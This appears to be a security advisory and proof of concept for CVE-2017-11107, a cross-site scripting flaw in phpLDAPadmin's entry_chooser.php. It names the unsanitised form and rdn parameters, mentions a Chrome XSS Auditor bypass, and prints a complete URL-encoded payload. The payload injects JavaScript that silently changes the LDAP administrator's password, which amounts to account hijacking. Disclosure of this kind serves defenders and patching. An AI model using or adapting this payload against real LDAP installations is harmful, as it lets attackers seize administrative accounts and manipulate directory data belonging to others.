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Hijacking phpLDAPadmin account using a Cross-site scripting vulnerability (CVE-2017-11107)

Software Description

phpLDAPadmin is an web-based LDAP adminstration interface for viewing and manipulating LDAP information.

Vulnerability Description

$request['form'] and $request['rdn'] parameters in file htdocs/entry_chooser.php aren't properly sanitized before being displayed to the user, which allows a remote attacker to inject arbitrary HTML/Javascript code in a user's context.

This vulnerability, if successfully exploited, can lead to data manipulation or information leakage as it is demonstrated in this PoC video.

Proof of Concept (PoC)

XSS via the 'form' parameter:


XSS via the 'rdn' parameter (needs Chrome's XSS Auditor bypass):


Changing admin password to '1337'

PAYLOAD : %22).base;%27);}%20var%20http=new%20XMLHttpRequest();%20var%20url=%22http://localhost:8888/phpldapadmin/cmd.php%22;%20var%20params=%22cmd%3Dupdate%2526server_id%3D1%2526dn%3Dcn%25253D<LOGIN_DN>%2526new_values%25255Buserpassword%25255D%25255B0%25255D%3D%25257BSSHA%25257Dxtzm0RhdgidTmNnRD0rvUdjCcGhPQgKa%22;,%20url,%20true);%20http.setRequestHeader(%22Content-type%22,%20%22application/x-www-form-urlencoded%22);%20http.send(params);%20function%20lol()%20{%20isNaN(%27

<LOGIN_DN> : Triple URL-Encoded login dn (Ex: cn%253Dadmin%252Cdc%253Dldap%252Cdc%253Dcom)





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